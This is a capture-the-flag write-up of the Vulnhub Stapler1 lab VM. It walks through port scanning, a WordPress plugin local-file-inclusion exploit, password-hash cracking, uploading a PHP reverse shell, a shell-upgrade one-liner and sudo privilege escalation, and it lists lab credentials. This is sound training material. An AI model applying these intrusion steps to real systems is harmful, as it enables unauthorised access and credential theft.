Stapler1 - Vulnhub VM Challenge

tl;dr

• Local File Inclusion

Solved by: 47Suriya

The IP of the target machine is found by using Netdiscover tool.

IP of the Machine is 192.168.29.184

Initial Analysis

First, Nmap scanner is used to find all the open ports and services.

┌──(kali㉿kali)-[~]
└─$ nmap -p- -sV -T4 192.168.29.184
Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-11 01:53 EDT
Nmap scan report for 192.168.29.184
Host is up (0.0021s latency).
Not shown: 65523 filtered ports
PORT      STATE  SERVICE     VERSION
20/tcp    closed ftp-data
21/tcp    open   ftp         vsftpd 2.0.8 or later
22/tcp    open   ssh         OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
53/tcp    open   domain      dnsmasq 2.75
80/tcp    open   http        PHP cli server 5.5 or later
123/tcp   closed ntp
137/tcp   closed netbios-ns
138/tcp   closed netbios-dgm
139/tcp   open   netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
666/tcp   open   tcpwrapped
3306/tcp  open   mysql       MySQL 5.7.12-0ubuntu1
12380/tcp open   http        Apache httpd 2.4.18 ((Ubuntu))
Service Info: Host: RED; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 100.84 seconds

This scan shows that there are a ton of ports open. It also reveals that there is NetBIOS open on port 139. There is also an SSH service running on port 22 which will require a username and a password to login. And there is also an Apache server open on port 12380 which might contain some information.

When navigated to the page on port 12380:

It contained nothing useful.

Now Nikto Web scanner is used to scan for any possible vulnerabilities.

┌──(kali㉿kali)-[~]
└─$ nikto -h http://192.168.29.184:12380/                      
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.29.184
+ Target Hostname:    192.168.29.184
+ Target Port:        12380
---------------------------------------------------------------------------
+ SSL Info:        Subject:  /C=UK/ST=Somewhere in the middle of nowhere/L=Really, what are you meant to put here?/O=Initech/OU=Pam: I give up. no idea what to put here./CN=Red.Initech/emailAddress=pam@red.localhost
                   Ciphers:  ECDHE-RSA-AES256-GCM-SHA384
                   Issuer:   /C=UK/ST=Somewhere in the middle of nowhere/L=Really, what are you meant to put here?/O=Initech/OU=Pam: I give up. no idea what to put here./CN=Red.Initech/emailAddress=pam@red.localhost
+ Start Time:         2021-08-11 01:56:26 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'dave' found, with contents: Soemthing doesn't look right here
+ The site uses SSL and the Strict-Transport-Security HTTP header is not defined.
+ The site uses SSL and Expect-CT header is not present.
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Entry '/admin112233/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/blogblog/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 2 entries which should be manually viewed.
+ Hostname '192.168.29.184' does not match certificate's names: Red.Initech
+ Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS 
+ Uncommon header 'x-ob_mode' found, with contents: 1
+ OSVDB-3233: /icons/README: Apache default file found.
+ /phpmyadmin/: phpMyAdmin directory found
+ 8071 requests: 0 error(s) and 15 item(s) reported on remote host
+ End Time:           2021-08-11 01:58:54 (GMT-4) (148 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

This scan also revealed that there is a robots.txt file and there were some hidden directories listed: /phpmyadmin/, /blogblog/, /admin112233/
But while trying to check the disallowed directories in the robots.txt file, it will get redirected to the home page. So by adding https:// before the ip, the file can be viewed.

This listed the directories which were already shown in the nikto scan. So it is time to check them out.

The admin112233 directory contained something scary;

Then navigating to the blogblog directory:

It was a blog page. And there was also an option to login. When that was selected:

A wordpress login page opened. But currently there was no login credentials.

Exploit

So WPscan (Wordpress Security Scanner) is used to enumerate users, plugins and any vulnerabilities.

And it revealed a bunch of usernames and plugins. And it also revealed that advanced-video-embed-embed-videos-or-playlists was vulnerable. While searching about that there was a WordPress Plugin Advanced Video 1.0 exploit which took advantage of a Local File Inclusion vulnerability.

And in the description it said:

This description revealed that the wp-config file content can be viewed which might contain some useful information.

After downloading this exploit, in order to run it, the ip has to be changed.
And in order to run it, the command below is used.

python exploit.py

There was no output returned. So let’s go to the blog page again:

And there was a difference now. A new jpeg file was added in the blog. This file might be something useful. After searching about the location of the uploaded files,
that directory was found to be /wp-content/uploads. So time to check that out:

And here it showed the file which was added in the blog. But the file can neither be downloaded nor be viewed. So let’s download it using wget:

And the file was downloaded! Now time to check it out. When using cat to display the contents of the file:

It was the config file and it contained the username and password for root which can be used for logging into the database. When logged in, there was a bunch of databases. And there was a database named wordpress. After displaying the tables in it:

There was a wp_users table which might contain some critical information like username and passwords. So using describe command the structure of the table can be displayed:

And Yes! There were columns user_login, user_pass which might be the username and the passwords. When those were displayed:

There was a bunch of usernames and hashed passwords. So let’s try to decode the first hash corresponding to the user John.
Here a tool John_The_Ripper is used to decode the hash.

┌──(kali㉿kali)-[~]
└─$ john --show hash.txt
?:incorrect

1 password hash cracked, 0 left

And the password for ‘John’ was found to be ‘incorrect’. Now it is time to login Wordpress as John.

And after the login, a PHP reverse shell from Pentest Monkey is uploaded as a plugin so that a reverse shell can be spawned.

After uploading it, let’s check the uploads directoy which was used to download the jpeg file before. Now it’s time to spawn a reverse shell.
A reverse shell can be spawned with the help of a netcat listener in the attacking machine and opening the reverse shell file in the target machine.

Now, a reverse shell is spawned. This is a dumb shell. It can be made into a normal one using the command below:

python -c 'import pty; pty.spawn("/bin/bash")'

Privilege Escalation

And now, the privileges should be escalated to root. For that, the bash history is checked to see the previous commands used:

This history reveals 2 SSH login credentials:

JKanode:thisimypassword
peter:JZQuyIN5

When trying to login ssh as JKanode, there were no sudo permissions for the user. But when logging in as peter and checking the allowed commands:

Yes! User peter can use all the commands. Now time to become a root user using the command sudo su.

And after getting root access, the flag is found in the /root directory.

The challenge is now complete!!